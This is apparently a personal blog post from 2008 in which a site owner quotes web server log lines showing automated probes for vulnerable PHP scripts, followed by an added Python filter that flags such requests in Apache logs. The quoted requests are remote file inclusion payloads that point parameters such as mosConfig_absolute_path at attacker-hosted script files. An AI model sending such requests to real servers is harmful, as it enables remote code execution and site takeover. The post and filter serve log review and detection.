Browsing through the web logs looking fo ... / 2008-08-26

Browsing through the web logs looking for any problems shows heaps of IPs trying to find vulnerable PHP scripts to break into using an approach of constructing lots of URLs with the vulnerable script and the right parameters at the end. Sometimes scans from one IP mingling with scans from another IP. Samples:
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET /~koos/newstag.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
193.207.106.54 - - [26/Aug/2008:13:18:40 +0200] "GET /~koos/newstag.cgi/security//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
74.55.98.10 - - [26/Aug/2008:15:53:50 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.813"
193.142.215.12 - - [26/Aug/2008:21:46:07 +0200] "GET /~koos/error.php?dir=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"
The one that puzzles me because I see a lot of it and can't find the associated vulnerability:
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/spam/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 901 "-" "libwww-perl/5.79"
62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
Not an advertisement for PHP, this.
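
An added example, not part of the original post: a small Python filter that picks this kind of probe out of an Apache combined-format access log by flagging query parameters whose value is itself a URL, grouped per client IP. The sample lines, addresses and host names are constructed, and the function names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache combined log format: ip, time, method, target, status, size, referer, agent
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (.*?) HTTP/[\d.]+" '
                  r'(\d{3}) \S+ "[^"]*" "([^"]*)"')
# Parameter value that is itself a URL; ":/+" also accepts the "http:/host" variant
REMOTE_VALUE = re.compile(r'^(?:https?|ftp):/+\S', re.I)

def rfi_params(target):
    """Return [(param, url)] for query parameters whose value is a remote URL."""
    _, _, query = target.partition("?")
    hits = []
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        value = unquote(value)
        if REMOTE_VALUE.match(value):
            hits.append((name, value.rstrip("?")))
    return hits

def scan(lines):
    """Group probes by client IP with path, parameter, payload URL and status."""
    report = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not combined log format; skip rather than guess
        ip, _, _, target, status, agent = m.groups()
        for name, url in rfi_params(target):
            report[ip].append({"path": target.split("?")[0], "param": name,
                               "payload": url, "status": int(status), "agent": agent})
    return dict(report)

def needs_review(report):
    """Probes answered with 200: the script exists or a catch-all page was served."""
    return sorted({(ip, h["path"]) for ip, hits in report.items()
                   for h in hits if h["status"] == 200})

# Constructed sample lines (documentation addresses and hosts, not real traffic)
SAMPLE = [
    '203.0.113.5 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&GLOBALS=&mosConfig_absolute_path=http://payload.example/a.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"',
    '203.0.113.5 - - [26/Aug/2008:13:18:40 +0200] "GET /blog//index.php?mosConfig_absolute_path=http://payload.example/a.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [26/Aug/2008:21:46:07 +0200] "GET /error.php?dir=http:/payload.example/b.txt?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"',
    '192.0.2.9 - - [26/Aug/2008:22:00:00 +0200] "GET /index.php?page=about HTTP/1.1" 200 3155 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan(SAMPLE), needs_review(scan(SAMPLE)))
```

A 200 on a probed path does not by itself mean the include worked; it only marks the request as one to check by hand against what is actually served at that path.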


Koos van den Hout, reachable as koos+website@idefix.net. PGP encrypted e-mail preferred.

PGP key 5BA9 368B E6F3 34E4